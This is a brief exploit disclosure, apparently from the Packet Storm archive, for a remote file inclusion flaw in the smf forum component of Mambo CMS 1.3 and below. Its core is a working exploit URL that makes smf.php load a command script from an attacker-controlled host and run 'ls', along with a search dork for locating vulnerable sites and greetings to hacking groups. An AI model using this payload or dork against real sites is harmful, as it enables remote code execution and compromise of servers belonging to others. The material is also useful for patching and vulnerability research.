smf forum for Mambo CMS versions 1.3 and below suffer from a remote file inclusion flaw.
ecad8e8165118b91710866537d13142418da40dc8872875330ae77beb3b2a6eb--------------------------------------------------------------------------------
Title : smf forum for Mambo CMS <= 1.3 Remote File Include Vulnerabilities
###############################################################################
Discovered By OLiBekaS
-----------------------------------------------------------------------------
Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : component for Mambo CMS
version : 1.3
-----------------------------------------------------------------------------
bug found in file : smf.php
dork : allinurl:"com_smf"
Exploit :
http://[target]/[path]/components/com_smf/smf.php?mosConfig_absolute_path=http://[attacker]/cmd.txt?&cmd=ls
------------------------------------------------------------------------------
greatz:
~~~~~
# Special greetz to my master effex and bEdAh`oTaK ( thank man )
# To all members of #papmahackerlink, cgibin, weleh, skulmatic, sikunYuk, brokencode, ulga, SaMuR4i_X, bigmaster, yugo^cloudy. and other
-------------------------------------------------------------------------------
Contact:
~~~~~~~
Nick: OLiBekaS
E-mail: olibekas[at]gmail[dot]Com
Homepage: http://bekas.6te.net
--------------------------------- [ eof ] ---------------------------------------
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed